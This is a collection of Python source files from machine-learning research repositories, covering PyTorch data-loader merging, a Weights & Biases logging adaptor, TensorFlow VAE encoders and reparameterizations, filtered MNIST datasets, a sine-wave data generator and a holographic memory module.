for idx in range(len(datasets)):
current_dataset = deepcopy(datasets[idx]) # copy to create new
for ds in datasets[0:idx]: # add all previous datasets
current_dataset += ds
# Get the current data loader and its sampler
current_loader = getattr(loaders[idx], split + "_loader")
current_sampler = current_loader.sampler
# Handle the sampler and shuffling
is_shuffled = isinstance(current_loader.sampler, torch.utils.data.RandomSampler)
new_sampler = current_sampler
if is_shuffled and not fixed_shuffle: # ds is shuffled, but dont require fixed shuffle
new_sampler = None
elif fixed_shuffle: # require fixed shuffle
new_sampler = FixedRandomSampler(current_dataset)
else:
raise ValueError("Unknown sampler / fixed_shuffle combo.")
# Build the new loader using the existing dataloader
new_dataloader = create_loader(current_dataset,
sampler=new_sampler,
batch_size=current_loader.batch_size,
shuffle=is_shuffled and not fixed_shuffle,
pin_memory=current_loader.pin_memory,
drop_last=current_loader.drop_last,
num_workers=current_loader.num_workers,
timeout=current_loader.timeout,
worker_init_fn=current_loader.worker_init_fn)
setattr(loaders[idx], split + "_loader", new_dataloader)
return loaders
def sequential_test_set_merger(loaders):
"""Given a list of loaders, merge their test sets in each new loader
while keeping the other sets the same. Syntactic sygar for sequential_dataset_set_merger.
Eg: [L1, L2, L3] --> [L1, L1+L2(test), L1+L2+L3(test)].
:param loaders: list of loaders with .test_loader member populated
:returns: the list of loaders with the merge completed.
:rtype: list
"""
return sequential_dataset_merger(loaders, split='train', fixed_shuffle=True)
def data_loader_to_np(data_loader):
""" Use the data-loader to iterate and return np array.
Useful for FID calculations
:param data_loader: the torch dataloader
:returns: numpy array of input images
:rtype: np.array
"""
images_array = []
for img, _ in data_loader:
images_array.append(img)
images_array = np.transpose(np.vstack(images_array), [0, 2, 3, 1])
# convert to uint8
if images_array.max() < 255:
images_array *= 255
assert images_array.shape[-1] == 3 or images_array.shape[-1] == 1
return images_array.astype(np.uint8)
def get_numpy_dataset(task, data_dir, transform, split, cuda=False, workers_per_replica=2):
""" Builds the loader --> get test numpy data and returns.
:param task: the string task to use
:param data_dir: directory for data
:param transform: the transform to use for the dataset
:param split: train, test or valid
:param cuda: bool indiciating cuda or not
:param workers_per_replica: number of dataloading threads
:returns: test numpy array
:rtype: np.array
"""
loader = ldr.get_loader(task=task,
data_dir=data_dir,
batch_size=1,
cuda=cuda, pin_memory=cuda,
train_transform=transform,
test_transform=transform,
valid_transform=transform,
workers_per_replica=workers_per_replica)
# gather the training and test datasets in numpy
if split == 'test':
return data_loader_to_np(loader.test_loader)
elif split == 'train':
return data_loader_to_np(loader.train_loader)
elif split == 'valid':
return data_loader_to_np(loader.valid_loader)
raise ValueError("Unknown split provided to get_numpy_dataset.")
``` |
{
"source": "jramapuram/helpers",
"score": 3
} |
#### File: jramapuram/helpers/wandb_writer.py
```python
import os
import wandb
from tensorboardX.utils import figure_to_image
from tensorboardX.x2num import make_np
from .utils import hash_to_size
class WandBWriter:
"""Simple adaptor for weights & biases logger."""
def __init__(self, env, server, config, model, port=8080, log_folder=None):
self.env = env
self.server = server
self.port = port
server_format_str = 'http://{}:{}'
os.environ['WANDB_BASE_URL'] = server_format_str.format(
server.replace('http://', ''), port)
# Where to save the logs
self.log_folder = os.path.expanduser(os.path.join(log_folder, env))
if self.log_folder is not None and not os.path.isdir(self.log_folder):
os.makedirs(self.log_folder)
# create the wandb object
self.server = wandb.init(
# name=env, id=env,
# id=env,
# id=hash_to_size(env, size=64),
name=hash_to_size(env, size=16),
resume=True,
config=config,
dir=self.log_folder,
)
wandb.watch(model)
def add_scalar(self, tag, scalar_value, global_step=None):
"""Add scalar data to Visdom. Plots the values in a plot titled
{main_tag}-{tag}.
Args:
tag (string): Data identifier
scalar_value (float or string/blobname): Value to save
global_step (int): Global step value to record
"""
scalar_dict = {'epoch': global_step, tag: scalar_value}
return self.add_scalars(scalar_dict)
def add_scalars(self, tag_scalar_dict, global_step=None):
"""Adds many scalar data to summary.
Note that this function also keeps logged scalars in memory. In extreme case it explodes your RAM.
Args:
tag_scalar_dict (dict): Key-value pair storing the tag and corresponding values
global_step (int): Global step value to record
Examples::
writer.add_scalars({'xsinx':i*np.sin(i/r),
'xcosx':i*np.cos(i/r),
'arctanx': numsteps*np.arctan(i/r)}, i)
This function adds three plots:
'xsinx',
'xcosx',
'arctanx'
with the corresponding values.
"""
if global_step is not None and 'epoch' not in tag_scalar_dict:
tag_scalar_dict['epoch'] = global_step
wandb.log(tag_scalar_dict, commit=True)
def add_histogram(self, tag, values, global_step=None, bins='tensorflow'):
"""Add histogram to summary.
Args:
tag (string): Data identifier
values (torch.Tensor, numpy.array, or string/blobname): Values to build histogram
global_step (int): Global step value to record
bins (string): one of {'tensorflow', 'auto', 'fd', ...}, this determines how the bins are made. You can find
other options in: https://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html
"""
hist_dict = {'epoch': global_step, tag: wandb.Histogram(values)}
wandb.log(hist_dict, commit=True)
def add_image(self, tag, img_tensor, global_step=None, caption=None):
"""Add image data to summary.
Note that this requires the ``pillow`` package.
Args:
tag (string): Data identifier
img_tensor (torch.Tensor, numpy.array, or string/blobname): Image data
global_step (int): Global step value to record
Shape:
img_tensor: :math:`(C, H, W)`. Use ``torchvision.utils.make_grid()`` to prepare it is a good idea.
C = colors (can be 1 - grayscale, 3 - RGB, 4 - RGBA)
"""
img_dict = {'epoch': global_step, tag: wandb.Image(img_tensor, caption=caption)}
wandb.log(img_dict, commit=True)
def add_figure(self, tag, figure, global_step=None, close=True):
"""Render matplotlib figure into an image and add it to summary.
Note that this requires the ``matplotlib`` package.
Args:
tag (string): Data identifier
figure (matplotlib.pyplot.figure) or list of figures: figure or a list of figures
global_step (int): Global step value to record
close (bool): Flag to automatically close the figure
"""
self.add_image(tag, figure_to_image(figure, close), global_step)
def add_video(self, tag, vid_tensor, global_step=None, fps=4):
"""Add video data to summary.
Note that this requires the ``moviepy`` package.
Args:
tag (string): Data identifier
vid_tensor (torch.Tensor): Video data
global_step (int): Global step value to record
fps (float or int): Frames per second
Shape:
vid_tensor: :math:`(B, C, T, H, W)`. (if following tensorboardX format)
vid_tensor: :math:`(T, H, W, C)`. (if following visdom format)
B = batches, C = colors (1, 3, or 4), T = time frames, H = height, W = width
"""
vid_dict = {'epoch': global_step, tag: wandb.Video(vid_tensor, fps=4, format="gif")}
wandb.log(vid_dict, commit=True)
def add_audio(self, tag, snd_tensor, global_step=None, sample_rate=44100, caption=None):
"""Add audio data to summary.
Args:
tag (string): Data identifier
snd_tensor (torch.Tensor, numpy.array, or string/blobname): Sound data
global_step (int): Global step value to record
sample_rate (int): sample rate in Hz
Shape:
snd_tensor: :math:`(1, L)`. The values should lie between [-1, 1].
"""
wandb.log({tag: [wandb.Audio(snd_tensor, caption=caption, sample_rate=sample_rate/1000.)],
'epoch': global_step}, commit=True)
def add_text(self, tag, text_string, global_step=None, append=False):
"""Add text data to summary.
Args:
tag (string): Data identifier
text_string (string): String to save
global_step (int): Global step value to record
Examples::
writer.add_text('lstm', 'This is an lstm', 0)
writer.add_text('rnn', 'This is an rnn', 10)
"""
wandb.run.summary[tag] = text_string
def add_pr_curve(self, tag, labels, predictions, global_step=None, num_thresholds=127, weights=None):
"""Adds precision recall curve.
Args:
tag (string): Data identifier
labels (torch.Tensor, numpy.array, or string/blobname): Ground truth data. Binary label for each element.
predictions (torch.Tensor, numpy.array, or string/blobname):
The probability that an element be classified as true. Value should in [0, 1]
global_step (int): Global step value to record
num_thresholds (int): Number of thresholds used to draw the curve.
"""
labels, predictions = make_np(labels), make_np(predictions)
pr_dict = {tag: wandb.plots.precision_recall(y_true=labels, y_probas=predictions),
'epoch': global_step}
wandb.log(pr_dict, commit=True)
def save(self):
"""Commits a set of logs."""
wandb.log({})
def close(self):
pass
``` |
{
"source": "jramapuram/LifelongVAE",
"score": 2
} |
#### File: jramapuram/LifelongVAE/encoders.py
```python
import tensorflow as tf
import tensorflow.contrib.slim as slim
# from tensorflow.contrib.slim.nets import resnet_v2, resnet_utils
def copy_layer(sess, src_layer, src_scope, dest_layer, dst_scope):
src_vars = [v for v in tf.global_variables()
if src_layer.scope in v.name and src_scope in v.name]
dest_vars = [v for v in tf.global_variables()
if dest_layer.scope in v.name and dst_scope in v.name]
copy_ops = []
for s, d in zip(src_vars, dest_vars):
if ('BatchNorm' not in s.name or 'BatchNorm' not in d.name) \
and ('Adam' not in s.name or 'Adam' not in d.name):
if s.get_shape().as_list() == d.get_shape().as_list():
print 'copying %s [%s] --> %s [%s]' \
% (s.name, s.get_shape().as_list(),
d.name, d.get_shape().as_list())
copy_ops.append(d.assign(s))
sess.run(copy_ops)
def reinit_last_layer(sess, dest_layer):
dst_proj_vars = [v for v in tf.global_variables()
if dest_layer.scope in v.name
and 'projection' in v.name]
print 'proj_vars = ', dst_proj_vars
reinit_ops = [d.initializer for d in dst_proj_vars]
sess.run(reinit_ops)
def _get_normalizer(is_training, use_bn, use_ln):
'''
Helper to get normalizer function and params
'''
batch_norm_params = {'is_training': is_training,
'decay': 0.999, 'center': True,
'scale': True, 'updates_collections': None}
layer_norm_params = {'center': True, 'scale': True}
if use_ln:
print 'using layer norm'
normalizer_fn = slim.layer_norm
normalizer_params = layer_norm_params
elif use_bn:
print 'using batch norm'
normalizer_fn = slim.batch_norm
normalizer_params = batch_norm_params
else:
print 'not using any layer normalization scheme'
normalizer_fn = None
normalizer_params = None
return [normalizer_fn, normalizer_params]
def forward(inputs, operator):
'''
Helper function to forward pass on the inputs using the provided model
'''
return operator.get_model(inputs)
class CNNEncoder(object):
def __init__(self, sess, latent_size, is_training,
activation=tf.nn.elu, df_dim=32,
use_bn=False, use_ln=False,
scope="cnn_encoder"):
self.sess = sess
self.layer_type = "cnn"
self.df_dim = df_dim
self.latent_size = latent_size
self.activation = activation
self.use_bn = use_bn
self.use_ln = use_ln
self.scope = scope
self.is_training = is_training
def get_info(self):
return {'activation': self.activation.__name__,
'latent_size': self.latent_size,
'sizes': self.get_sizing(),
'use_bn': str(self.use_bn),
'use_ln': str(self.use_ln)}
def get_sizing(self):
return '4_5x5xN_s2_fc%d' % (self.latent_size)
def get_detailed_sizing(self):
return 's2_5x5x%d_' % self.df_dim \
+ 's2_5x5x%d_' % self.df_dim*2 \
+ 's2_5x5x%d_' % self.df_dim*4 \
+ 's2_5x5x%d_' % self.df_dim*8 \
+ 'fc%d' % self.latent_size
def get_model(self, x):
# get the normalizer function and parameters
normalizer_fn, normalizer_params = _get_normalizer(self.is_training,
self.use_bn,
self.use_ln)
# winit = tf.contrib.layers.xavier_initializer_conv2d()
winit = tf.truncated_normal_initializer(stddev=0.02)
with tf.variable_scope(self.scope):
with slim.arg_scope([slim.conv2d],
activation_fn=self.activation,
weights_initializer=winit,
biases_initializer=tf.constant_initializer(0),
normalizer_fn=normalizer_fn,
normalizer_params=normalizer_params):
xshp = x.get_shape().as_list()
x_flat = x if len(xshp) == 4 else tf.expand_dims(x, -1)
print("xflat = ", x_flat.get_shape().as_list())
h0 = slim.conv2d(x_flat, self.df_dim, [5, 5], stride=1, padding='VALID')
h1 = slim.conv2d(h0, self.df_dim*2, [4, 4], stride=2, padding='VALID')
h2 = slim.conv2d(h1, self.df_dim*4, [4, 4], stride=1, padding='VALID')
h3 = slim.conv2d(h2, self.df_dim*8, [4, 4], stride=2, padding='VALID')
h4 = slim.conv2d(h3, self.df_dim*16, [4, 4], stride=1, padding='VALID')
h5 = slim.conv2d(h4, self.df_dim*16, [1, 1], stride=1, padding='VALID')
h6 = slim.conv2d(h5, self.latent_size, [1, 1], stride=1, padding='VALID',
weights_initializer=winit,
biases_initializer=tf.constant_initializer(0),
activation_fn=None, normalizer_fn=None)
print('conv encoded final = ', h6.get_shape().as_list())
return tf.reshape(h6, [xshp[0], -1])
class DenseEncoder(object):
def __init__(self, sess, latent_size, is_training,
activation=tf.nn.elu,
sizes=[512, 512], use_bn=False, use_ln=False,
double_features=False,
scope="dense_encoder"):
self.sess = sess
self.layer_type = "dnn"
self.latent_size = latent_size
self.activation = activation
self.sizes = sizes
self.use_bn = use_bn
self.use_ln = use_ln
self.scope = scope
self.double_features = 2 if double_features else 1
self.is_training = is_training
def get_info(self):
return {'activation': self.activation.__name__,
'latent_size': self.latent_size,
'sizes': str(self.sizes),
'use_bn': str(self.use_bn),
'use_ln': str(self.use_ln)}
def get_sizing(self):
return str(self.sizes)
def get_model(self, inputs):
# get the normalizer function and parameters
normalizer_fn, normalizer_params = _get_normalizer(self.is_training,
self.use_bn,
self.use_ln)
winit = tf.contrib.layers.xavier_initializer()
binit = tf.constant_initializer(0)
with tf.variable_scope(self.scope):
with slim.arg_scope([slim.fully_connected],
activation_fn=self.activation,
weights_initializer=winit,
biases_initializer=binit,
normalizer_fn=normalizer_fn,
normalizer_params=normalizer_params):
layers = slim.stack(inputs, slim.fully_connected,
self.sizes, scope="layer")
output_size = self.latent_size * self.double_features
return slim.fully_connected(layers, output_size,
activation_fn=None,
normalizer_fn=None,
weights_initializer=winit,
biases_initializer=binit,
scope='projection')
```
#### File: jramapuram/LifelongVAE/mnist_number.py
```python
import os
import h5py
import numpy as np
from copy import deepcopy
from tensorflow.examples.tutorials.mnist import input_data
from itertools import compress
from utils import zip_filter_unzip
from scipy.misc import imrotate as rotate
from scipy.misc import imresize as imresize
# An object that filters MNIST to a single number
class MNIST_Number(object):
def __init__(self, number, mnist, is_one_vs_all=False,
is_flat=True, resize_dims=None,
convert_to_rgb=False):
self.input_size = len(mnist.train.images[0])
self.number = number # the number to filter out
self.is_one_vs_all = is_one_vs_all
if not is_one_vs_all:
self.blacklist = list(np.arange(11))
self.blacklist.remove(self.number)
else:
self.blacklist = [1] # the 'other' class
# filter out all other numbers
self.mnist = MNIST_Number.filter_numbers(mnist, self.blacklist)
# return images in [batch, row, col]
if not is_flat:
self.mnist = MNIST_Number._unflatten_mnist(self.mnist)
# resizes images if resize_dims tuple is provided
if resize_dims is not None:
self.mnist = MNIST_Number.resize_mnist(self.mnist, resize_dims)
# tile images as [img, img, img]
if convert_to_rgb:
self.mnist = MNIST_Number.bw_to_rgb_mnist(self.mnist)
@staticmethod
def _unflatten_mnist(mnist):
mnist.train._images = mnist.train._images.reshape([-1, 28, 28])
mnist.validation._images = mnist.validation._images.reshape([-1, 28, 28])
mnist.test._images = mnist.test._images.reshape([-1, 28, 28])
return mnist
@staticmethod
def resize_mnist(mnist, new_dims):
mnist.train._images = MNIST_Number.resize_images(mnist.train._images, new_dims)
mnist.validation._images = MNIST_Number.resize_images(mnist.validation._images, new_dims)
mnist.test._images = MNIST_Number.resize_images(mnist.test._images, new_dims)
return mnist
@staticmethod
def bw_to_rgb_mnist(mnist):
mnist.train._images = MNIST_Number.bw_to_rgb(mnist.train._images)
mnist.validation._images = MNIST_Number.bw_to_rgb(mnist.validation._images)
mnist.test._images = MNIST_Number.bw_to_rgb(mnist.test._images)
return mnist
@staticmethod
def resize_images(imgs, new_dims, flatten=False):
flattened_dims = [-1, np.prod(new_dims)] if flatten else [-1] + new_dims
return np.vstack([imresize(img.reshape(28, 28),
new_dims).reshape(flattened_dims)
for img in imgs]) / 255.
@staticmethod
def bw_to_rgb(imgs):
return np.vstack([np.tile(img.reshape(img.shape[0], imgs.shape[1], 1), 3)
.reshape(-1, img.shape[0], img.shape[1], 3)
for img in imgs])
@staticmethod
def _rotate_batch(batch, angle):
return np.vstack([rotate(x_i.reshape(28, 28), angle).reshape([-1, 28*28])
for x_i in batch]) / 255.
@staticmethod
def _check_and_load_angle(angle, number, base_path='MNIST_data'):
''' Returns None if the file doesn't exists'''
filename = os.path.join(base_path, "mnist_num%d_angle%d.hdf5"
% (number, angle))
if os.path.exists(filename):
f = h5py.File(filename, "r")
return f['train'][()], f['validation'][()], f['test'][()]
# return f['train'], f['validation'], f['test']
return None
@staticmethod
def _check_and_write_angle(angle, number, mnist, base_path='MNIST_data'):
''' serializes the rotated number to disk as a hdf5 file'''
filename = os.path.join(base_path, "mnist_num%d_angle%d.hdf5"
% (number, angle))
if not os.path.exists(filename):
f = h5py.File(filename, "w")
f['train'] = mnist.train._images
f['validation'] = mnist.validation._images
f['test'] = mnist.test._images
print 'serialized %s to disk...' % filename
@staticmethod
def rotate_all_sets(mnist, number, angle):
hpf5_load = MNIST_Number._check_and_load_angle(angle, number)
if hpf5_load is not None:
train_imgs = np.asarray(hpf5_load[0], np.float32)
validation_imgs = np.asarray(hpf5_load[1], np.float32)
test_imgs = np.asarray(hpf5_load[2], np.float32)
else:
train_imgs = MNIST_Number._rotate_batch(mnist.train._images, angle)
validation_imgs = MNIST_Number._rotate_batch(mnist.validation._images, angle)
test_imgs = MNIST_Number._rotate_batch(mnist.test._images, angle)
mnist.train._images = train_imgs
mnist.validation._images = validation_imgs
mnist.test._images = test_imgs
MNIST_Number._check_and_write_angle(angle, number, mnist)
return mnist
@staticmethod
def filter_numbers(mnist, blacklist):
digits = deepcopy(mnist)
digits.train._images, digits.train._labels = zip_filter_unzip(digits.train._images
, digits.train._labels
, blacklist)
digits.train._images = np.array(digits.train._images)
digits.train._labels = np.array(digits.train._labels)
digits.train._num_examples = len(digits.train.images)
digits.validation._images, digits.validation._labels = zip_filter_unzip(digits.validation._images
, digits.validation._labels
, blacklist)
digits.validation._num_examples = len(digits.validation.images)
digits.validation._images = np.array(digits.validation._images)
digits.validation._labels = np.array(digits.validation._labels)
digits.test._images, digits.test._labels = zip_filter_unzip(digits.test._images
, digits.test._labels
, blacklist)
digits.test._images = np.array(digits.test._images)
digits.test._labels = np.array(digits.test._labels)
digits.test._num_examples = len(digits.test.images)
return digits
# if one vs. all then 0 = true class, 1 = other
# otherwise we just use lbl = lbl, 10 = other
def _augment(self, images, labels):
indexer = np.array(labels == self.number)
if self.is_one_vs_all:
return zip(*((im, 0) if ind else (im, 1)
for im, lbl, ind in zip(images, labels, indexer)))
else:
return zip(*((im, lbl) if ind else (im, 10)
for im, lbl, ind in zip(images, labels, indexer)))
def get_train_batch_iter(self, batch_size):
images, labels = self.mnist.train.next_batch(batch_size)
#images, labels = self._augment(images, labels)
return np.array(images), np.array(labels)
def get_validation_batch_iter(self, batch_size):
images, labels = self.mnist.validation.next_batch(batch_size)
#images, labels = self._augment(images, labels)
return np.array(images), np.array(labels)
def _get_test_batch_iter(self, batch_size):
images, labels = self.mnist.test.next_batch(batch_size)
images, labels = self._augment(images, labels)
return np.array(images), np.array(labels)
def get_test_batch_iter(self, batch_size):
images = []; labels = []; count = 0
while(count < batch_size):
max_batch = self.mnist.test._num_examples
im, lbl = self._get_test_batch_iter(max_batch)
tar = 0 if self.is_one_vs_all else self.number
if tar in lbl:
im, lbl = zip_filter_unzip(im, lbl, self.blacklist)
count += len(im)
# im = np.asarray(im); lbl = np.asarray(lbl); count += len(lbl)
images.append(im); labels.append(lbl)
return np.vstack(images)[0:batch_size], np.hstack(labels)[0:batch_size]
def get_batch_iter(self, batch_size):
images = []; labels = []; count = 0
while(count < batch_size):
im, lbl = self.get_train_batch_iter(batch_size)
tar = 0 if self.is_one_vs_all else self.number
if tar in lbl:
# im, lbl = zip_filter_unzip(im, lbl, self.blacklist)
im = np.asarray(im); lbl = np.asarray(lbl); count += len(lbl)
images.append(im); labels.append(lbl)
return np.vstack(images)[0:batch_size], np.hstack(labels)[0:batch_size]
class AllMnist():
def __init__(self, one_hot=True,
is_flat=True,
resize_dims=None,
convert_to_rgb=False):
self.mnist = input_data.read_data_sets('MNIST_data', one_hot=one_hot)
self.one_hot = one_hot
self.number = 99997 # XXX
self.num_examples = self.mnist.test._num_examples
# return images in [batch, row, col]
if not is_flat:
self.mnist = MNIST_Number._unflatten_mnist(self.mnist)
# resizes images if resize_dims tuple is provided
if resize_dims is not None:
self.mnist = MNIST_Number.resize_mnist(self.mnist, resize_dims)
# tile images as [img, img, img]
if convert_to_rgb:
self.mnist = MNIST_Number.bw_to_rgb_mnist(self.mnist)
def get_train_batch_iter(self, batch_size):
images, labels = self.mnist.train.next_batch(batch_size)
#images, labels = self._augment(images, labels)
return np.array(images), np.array(labels)
def get_validation_batch_iter(self, batch_size):
images, labels = self.mnist.validation.next_batch(batch_size)
#images, labels = self._augment(images, labels)
return np.array(images), np.array(labels)
def _get_test_batch_iter(self, batch_size):
images, labels = self.mnist.test.next_batch(batch_size)
images, labels = self._augment(images, labels)
return np.array(images), np.array(labels)
def get_test_batch_iter(self, batch_size):
return self._get_test_batch_iter(batch_size)
def get_batch_iter(self, batch_size):
return self.get_train_batch_iter(batch_size)
# Read mnist only once [~ 230Mb]
full_mnist = input_data.read_data_sets('MNIST_data', one_hot=False)
# full_mnist.train._images /= 255.
# full_mnist.validation._images /= 255.
# full_mnist.test._images /= 255.
```
#### File: jramapuram/LifelongVAE/reparameterizations.py
```python
import tensorflow as tf
import tensorflow.contrib.distributions as d
from utils import gumbel_softmax, shp
sg = tf.contrib.bayesflow.stochastic_graph
st = tf.contrib.bayesflow.stochastic_tensor
def gaussian_reparmeterization(logits_z, rnd_sample=None):
'''
The vanilla gaussian reparameterization from Kingma et. al
z = mu + sigma * N(0, I)
'''
zshp = logits_z.get_shape().as_list()
assert zshp[1] % 2 == 0
q_sigma = 1e-6 + tf.nn.softplus(logits_z[:, 0:zshp[1]/2])
q_mu = logits_z[:, zshp[1]/2:]
# Prior
p_z = d.Normal(loc=tf.zeros(zshp[1] / 2),
scale=tf.ones(zshp[1] / 2))
with st.value_type(st.SampleValue()):
q_z = st.StochasticTensor(d.Normal(loc=q_mu, scale=q_sigma))
reduce_index = [1] if len(zshp) == 2 else [1, 2]
kl = d.kl_divergence(q_z.distribution, p_z, allow_nan_stats=False)
return [q_z, tf.reduce_sum(kl, reduce_index)]
# def gaussian_reparmeterization(logits_z, rnd_sample=None):
# '''
# The vanilla gaussian reparameterization from Kingma et. al
# z = mu + sigma * N(0, I)
# '''
# zshp = logits_z.get_shape().as_list()
# assert zshp[1] % 2 == 0
# z_log_sigma_sq = logits_z[:, 0:zshp[1]/2]
# z_mean = logits_z[:, zshp[1]/2:]
# print 'zmean shp = ', z_mean.get_shape().as_list()
# print 'z_log_sigma_sq shp = ', z_log_sigma_sq.get_shape().as_list()
# if rnd_sample is None:
# rnd_sample = tf.random_normal(tf.shape(z_mean), 0, 1,
# dtype=tf.float32)
# # cov = tf.multiply(tf.sqrt(tf.exp(z_log_sigma_sq)), rnd_sample)
# # softplus = log(exp(features) + 1)
# cov = tf.multiply(tf.sqrt(tf.nn.softplus(z_log_sigma_sq)), rnd_sample)
# z = tf.add(z_mean, cov, name="z")
# reduce_index = [1] if len(zshp) == 2 else [1, 2]
# kl = -0.5 * tf.reduce_sum(1.0 + z_log_sigma_sq - tf.square(z_mean)
# - tf.nn.softplus(z_log_sigma_sq), reduce_index)
# # kl = -0.5 * tf.reduce_sum(1.0 + z_log_sigma_sq - tf.square(z_mean)
# # - tf.exp(z_log_sigma_sq), reduce_index)
# return [z, kl]
def gumbel_reparmeterization(logits_z, tau, rnd_sample=None,
hard=True, eps=1e-9):
'''
The gumbel-softmax reparameterization
'''
latent_size = logits_z.get_shape().as_list()[1]
# Prior
p_z = d.OneHotCategorical(probs=tf.constant(1.0/latent_size,
shape=[latent_size]))
# p_z = d.RelaxedOneHotCategorical(probs=tf.constant(1.0/latent_size,
# shape=[latent_size]),
# temperature=10.0)
# p_z = 1.0 / latent_size
# log_p_z = tf.log(p_z + eps)
with st.value_type(st.SampleValue()):
q_z = st.StochasticTensor(d.RelaxedOneHotCategorical(temperature=tau,
logits=logits_z))
q_z_full = st.StochasticTensor(d.OneHotCategorical(logits=logits_z))
reduce_index = [1] if len(logits_z.get_shape().as_list()) == 2 else [1, 2]
kl = d.kl_divergence(q_z_full.distribution, p_z, allow_nan_stats=False)
if len(shp(kl)) > 1:
return [q_z, tf.reduce_sum(kl, reduce_index)]
else:
return [q_z, kl]
# reduce_index = [1] if len(logits_z.get_shape().as_list()) == 2 else [1, 2]
# kl = tf.reduce_sum(tf.reshape(q_z.distribu * (log_q_z - p_z. log_p_z),
# [-1, latent_size]), reduce_index)
# return [z, kl]
# def gumbel_reparmeterization(logits_z, tau, rnd_sample=None,
# hard=True, eps=1e-9):
# '''
# The gumbel-softmax reparameterization
# '''
# latent_size = logits_z.get_shape().as_list()[1]
# q_z = tf.nn.softmax(logits_z)
# log_q_z = tf.log(q_z + eps)
# p_z = 1.0 / latent_size
# log_p_z = tf.log(p_z + eps)
# # set hard=True for ST Gumbel-Softmax
# z = tf.reshape(gumbel_softmax(logits_z, tau,
# hard=hard,
# rnd_sample=rnd_sample),
# [-1, latent_size])
# print 'z_gumbel = ', z.get_shape().as_list()
# # kl = tf.reshape(p_z * (log_p_z - log_q_z),
# # [-1, latent_size])
# reduce_index = [1] if len(logits_z.get_shape().as_list()) == 2 else [1, 2]
# kl = tf.reduce_sum(tf.reshape(q_z * (log_q_z - log_p_z),
# [-1, latent_size]), reduce_index)
# return [z, kl]
``` |
{
"source": "jramapuram/LSTM_Autoencoder",
"score": 3
} |
#### File: jramapuram/LSTM_Autoencoder/data_generator.py
```python
__author__ = 'jramapuram'
import numpy as np
from data_source import DataSource
from random import randint
from math import sin, pi
from data_manipulator import window, split, normalize
# from sklearn.cross_validation import train_test_split
class DataGenerator(DataSource):
def __init__(self, conf, plotter):
self.conf = conf
self.p = plotter
self.data = np.matrix([])
self.x_train = np.matrix([])
self.x_test = np.matrix([])
self.y_train = np.array([])
self.y_test = np.array([])
self.noise_count = 0
@staticmethod
def generate_sin_wave(input_size, num_waves, offset=1):
delta = 2 * pi / (input_size - offset) # for proper shifting
one_wave = [sin(delta * i) for i in xrange(0, input_size)]
return normalize(np.array(one_wave * num_waves)).flatten()
# return one_wave * num_waves
def add_amplitude_noise(self, signal, num_errors=1):
# signal = np.array(signal)
max_len = len(signal)
for i in xrange(0, num_errors):
location = randint(0, max_len - 1)
signal[location] = signal[location] + np.random.normal(5, 0.1) # TODO: parameterize this
self.noise_count += 1
return signal
def read_data(self):
wave = self.generate_sin_wave(int(self.conf['--input_dim'])
, int(self.conf['--num_periods']))
self.p.plot_wave(wave, 'train')
generator = window(wave, int(self.conf['--input_dim']))
self.data = np.array([item for item in generator])
self.x_train, self.x_test = split(self.data, float(self.conf['--test_ratio']))
self.x_test = self.add_amplitude_noise(self.x_test, 13) # XXX
print self.x_train.shape, self.x_test.shape
return self.x_train
def split_data(self):
if self.data.size == 0:
self.read_data()
# TODO: Generate a y output vector where noise is added
return (self.x_train, self.y_train), (self.x_test, self.y_test)
def get_noise_count(self):
return self.noise_count
``` |
{
"source": "jramapuram/memory",
"score": 3
} |
#### File: jramapuram/memory/holographic_memory.py
```python
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class Complex(object):
''' Simple Complex Number Class for pytorch '''
def __init__(self, real, imag=None):
''' if imag is none we divide real --> [re, im]'''
if imag is not None:
assert real.size() == imag.size(), "{}re != {}im".format(
real.size(), imag.size())
self._real = real
self._imag = imag
else:
assert real.size(-1) % 2 == 0, "need to be div by two"
assert real.dim() == 2, "only 2d supported"
half = real.size(-1) // 2
self._real = real[:, 0:half]
self._imag = real[:, half:]
def unstack(self):
return torch.cat([self._real, self._imag], dim=-1)
def __add__(self, other):
real = self._real + other._real
imag = self._imag + other._imag
return Complex(real, imag)
def __sub__(self, other):
real = self._real - other._real
imag = self._imag - other._imag
return Complex(real, imag)
def __mul__(self, other):
real = self._real * other._real + self._imag * other._imag
imag = self._real * other._imag + self._imag * other._real
return Complex(real, imag)
def __rmul__(self, other):
real = other._real * self._real + other._imag * self._imag
imag = other._imag * self._real + other._real * self._imag
return Complex(real, imag)
def abs(self):
return torch.sqrt(self._real * self._real + self._imag * self._imag)
def conj(self):
return Complex(self._real, -self._imag)
def size(self):
return self._real.size()
def real(self):
return self._real
def imag(self):
return self._imag
def long_type(use_cuda):
return torch.cuda.LongTensor if use_cuda else torch.LongTensor
def float_type(use_cuda):
return torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
def one_hot(num_cols, indices, use_cuda=False):
""" Creates a matrix of one hot vectors.
- num_cols: int
- indices: FloatTensor array
"""
batch_size = indices.size(0)
mask = long_type(use_cuda)(batch_size, num_cols).fill_(0)
ones = 1
if isinstance(indices, Variable):
ones = Variable(long_type(use_cuda)(indices.size()).fill_(1))
mask = Variable(mask, volatile=indices.volatile)
return mask.scatter_(1, indices, ones)
def circular_convolution_conv(keys, values, cuda=False):
'''
For the circular convolution of x and y to be equivalent,
you must pad the vectors with zeros to length at least N + L - 1
before you take the DFT. After you invert the product of the
DFTs, retain only the first N + L - 1 elements.
'''
assert values.dim() == keys.dim() == 2, "only 2 dims supported"
batch_size = keys.size(0)
keys_feature_size = keys.size(1)
values_feature_size = values.size(1)
required_size = keys_feature_size + values_feature_size - 1
# zero pad upto N+L-1
zero_for_keys = Variable(float_type(cuda)(
batch_size, required_size - keys_feature_size).zero_())
zero_for_values = Variable(float_type(cuda)(
batch_size, required_size - values_feature_size).zero_())
keys = torch.cat([keys, zero_for_keys], -1)
values = torch.cat([values, zero_for_values], -1)
# do the conv and reshape and return
print('values = ', values.view(batch_size, 1, -1).size(), ' keys = ', keys.view(batch_size, 1, -1).size())
print('conv = ', F.conv1d(values.view(batch_size, 1, -1),
keys.view(batch_size, 1, -1)).size())
return F.conv1d(values.view(batch_size, 1, -1),
keys.view(batch_size, 1, -1)).squeeze()[:, 0:required_size]
def circular_convolution_fft(keys, values, normalized=True, conj=False, cuda=False):
'''
For the circular convolution of x and y to be equivalent,
you must pad the vectors with zeros to length at least N + L - 1
before you take the DFT. After you invert the product of the
DFTs, retain only the first N + L - 1 elements.
'''
assert values.dim() == keys.dim() == 2, "only 2 dims supported"
assert values.size(-1) % 2 == keys.size(-1) % 2 == 0, "need last dim to be divisible by 2"
